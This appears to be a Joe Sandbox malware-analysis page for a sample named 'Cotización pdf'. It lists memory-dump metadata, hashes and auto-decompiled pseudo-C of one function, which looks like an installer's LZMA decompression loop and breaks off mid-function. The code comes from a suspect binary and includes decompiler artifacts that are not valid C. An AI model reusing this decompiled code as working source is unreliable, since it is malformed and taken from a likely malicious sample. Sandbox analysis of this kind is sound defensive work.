0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00406811
0x00000000
0x00406686

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
